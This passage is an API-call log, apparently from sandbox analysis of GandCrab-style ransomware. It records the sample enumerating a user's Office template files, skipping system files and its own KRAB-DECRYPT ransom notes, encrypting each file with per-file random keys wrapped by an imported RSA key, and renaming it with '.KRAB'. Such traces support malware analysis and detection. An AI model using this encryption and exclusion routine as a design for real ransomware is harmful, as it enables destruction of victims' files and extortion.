lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\KRAB-DECRYPT.txt") returned 112 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0074.046] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0074.046] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.047] FindNextFileW (in: hFindFile=0x1023db8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0074.047] FindClose (in: hFindFile=0x1023db8 | out: hFindFile=0x1023db8) returned 1 [0074.047] CloseHandle (hObject=0x468) returned 1 [0074.047] FindNextFileW (in: hFindFile=0x10239b8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0074.047] FindClose (in: hFindFile=0x10239b8 | out: hFindFile=0x10239b8) returned 1 [0074.047] CloseHandle (hObject=0x40c) returned 1 [0074.047] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0074.048] FindClose (in: hFindFile=0xfbd620 | out: hFindFile=0xfbd620) returned 1 [0074.048] CloseHandle (hObject=0x45c) returned 1 [0074.048] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0074.048] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0074.048] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0074.048] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a08d2ca4dee3d.lock" [0074.048] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.048] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 98 [0074.048] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a08d2ca4dee3d.lock") returned 93 [0074.049] lstrlenW (lpString=".lock") returned 5 [0074.049] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.049] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0074.049] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.049] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.049] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0074.049] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0074.050] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0074.050] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\KRAB-DECRYPT.txt" [0074.050] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.050] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\KRAB-DECRYPT.txt.KRAB") returned 91 [0074.050] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\KRAB-DECRYPT.txt") returned 86 [0074.050] lstrlenW (lpString=".txt") returned 4 [0074.050] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.050] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0074.050] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.051] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\KRAB-DECRYPT.txt") returned 86 [0074.051] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\KRAB-DECRYPT.txt") returned 86 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0074.051] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0074.051] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.051] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0074.051] FindClose (in: hFindFile=0xfbd5a0 | out: hFindFile=0xfbd5a0) returned 1 [0074.052] CloseHandle (hObject=0x420) returned 1 [0074.052] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0074.052] lstrcmpW (lpString1="Normal.dotm", lpString2=".") returned 1 [0074.052] lstrcmpW (lpString1="Normal.dotm", lpString2="..") returned 1 [0074.052] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Normal.dotm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" [0074.052] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.052] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.KRAB") returned 74 [0074.052] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 69 [0074.052] lstrlenW (lpString=".dotm") returned 5 [0074.052] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.053] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".dotm ") returned 6 [0074.053] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.053] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 69 [0074.053] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 69 [0074.053] lstrcmpiW (lpString1="Normal.dotm", lpString2="desktop.ini") returned 1 [0074.053] lstrcmpiW (lpString1="Normal.dotm", lpString2="autorun.inf") returned 1 [0074.053] lstrcmpiW (lpString1="Normal.dotm", lpString2="ntuser.dat") returned -1 [0074.053] lstrcmpiW (lpString1="Normal.dotm", lpString2="iconcache.db") returned 1 [0074.053] lstrcmpiW (lpString1="Normal.dotm", lpString2="bootsect.bak") returned 1 [0074.053] lstrcmpiW (lpString1="Normal.dotm", lpString2="boot.ini") returned 1 [0074.053] lstrcmpiW (lpString1="Normal.dotm", lpString2="ntuser.dat.log") returned -1 [0074.054] lstrcmpiW (lpString1="Normal.dotm", lpString2="thumbs.db") returned -1 [0074.054] lstrcmpiW (lpString1="Normal.dotm", lpString2="KRAB-DECRYPT.html") returned 1 [0074.054] lstrcmpiW (lpString1="Normal.dotm", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.054] lstrcmpiW (lpString1="Normal.dotm", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.054] lstrcmpiW (lpString1="Normal.dotm", lpString2="ntldr") returned -1 [0074.054] lstrcmpiW (lpString1="Normal.dotm", lpString2="NTDETECT.COM") returned -1 [0074.054] lstrcmpiW (lpString1="Normal.dotm", lpString2="Bootfont.bin") returned 1 [0074.054] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.054] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011ab8) returned 1 [0074.057] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0074.058] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0074.058] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0074.058] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0074.058] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0074.058] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.058] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1012558) returned 1 [0074.062] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0074.062] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0074.063] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0074.063] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0074.063] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.063] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.063] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1012558) returned 1 [0074.069] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023938) returned 1 [0074.069] CryptGetKeyParam (in: hKey=0x1023938, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0074.069] CryptEncrypt (in: hKey=0x1023938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0074.070] GetLastError () returned 0x0 [0074.070] CryptDestroyKey (hKey=0x1023938) returned 1 [0074.070] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.070] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011ab8) returned 1 [0074.073] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10239f8) returned 1 [0074.073] CryptGetKeyParam (in: hKey=0x10239f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0074.073] CryptEncrypt (in: hKey=0x10239f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0074.073] GetLastError () returned 0x0 [0074.073] CryptDestroyKey (hKey=0x10239f8) returned 1 [0074.074] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0074.074] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0074.074] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0074.074] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0074.075] ReadFile (in: hFile=0x420, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x49a5, lpOverlapped=0x0) returned 1 [0074.093] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xffffb65b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.094] WriteFile (in: hFile=0x420, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x49a5, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x49a5, lpOverlapped=0x0) returned 1 [0074.094] WriteFile (in: hFile=0x420, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0074.094] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.098] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.098] CloseHandle (hObject=0x420) returned 1 [0074.099] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.100] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\normal.dotm.krab")) returned 1 [0074.101] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.101] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0074.101] lstrcmpW (lpString1="Process Map for Basic Flowchart.xltx", lpString2=".") returned 1 [0074.101] lstrcmpW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="..") returned 1 [0074.101] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Process Map for Basic Flowchart.xltx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx" [0074.101] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.101] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx.KRAB") returned 99 [0074.101] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned 94 [0074.101] lstrlenW (lpString=".xltx") returned 5 [0074.101] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.102] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xltx ") returned 6 [0074.102] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.102] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned 94 [0074.102] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx") returned 94 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="desktop.ini") returned 1 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="autorun.inf") returned 1 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="ntuser.dat") returned 1 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="iconcache.db") returned 1 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="bootsect.bak") returned 1 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="boot.ini") returned 1 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="ntuser.dat.log") returned 1 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="thumbs.db") returned -1 [0074.102] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="KRAB-DECRYPT.html") returned 1 [0074.103] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.103] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.103] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="ntldr") returned 1 [0074.103] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="NTDETECT.COM") returned 1 [0074.103] lstrcmpiW (lpString1="Process Map for Basic Flowchart.xltx", lpString2="Bootfont.bin") returned 1 [0074.103] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.103] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1012558) returned 1 [0074.106] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0074.107] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0074.107] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0074.107] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0074.107] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.107] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.108] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1012558) returned 1 [0074.111] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0074.112] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0074.112] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0074.112] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0074.112] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.112] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.112] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1012558) returned 1 [0074.116] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023b78) returned 1 [0074.116] CryptGetKeyParam (in: hKey=0x1023b78, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0074.116] CryptEncrypt (in: hKey=0x1023b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0074.116] GetLastError () returned 0x0 [0074.116] CryptDestroyKey (hKey=0x1023b78) returned 1 [0074.116] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.116] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011ab8) returned 1 [0074.120] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023cb8) returned 1 [0074.120] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0074.120] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0074.120] GetLastError () returned 0x0 [0074.120] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0074.120] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0074.120] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for basic flowchart.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0074.121] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0074.121] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0074.121] ReadFile (in: hFile=0x420, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x1ad7d, lpOverlapped=0x0) returned 1 [0074.176] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xfffe5283, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.177] WriteFile (in: hFile=0x420, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1ad7d, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x1ad7d, lpOverlapped=0x0) returned 1 [0074.177] WriteFile (in: hFile=0x420, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0074.177] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.181] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.182] CloseHandle (hObject=0x420) returned 1 [0074.184] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.184] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for basic flowchart.xltx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Basic Flowchart.xltx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for basic flowchart.xltx.krab")) returned 1 [0074.185] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.186] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0074.186] lstrcmpW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2=".") returned 1 [0074.186] lstrcmpW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="..") returned 1 [0074.186] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Process Map for Cross-Functional Flowchart.xltx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx" [0074.186] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.186] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx.KRAB") returned 110 [0074.186] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned 105 [0074.186] 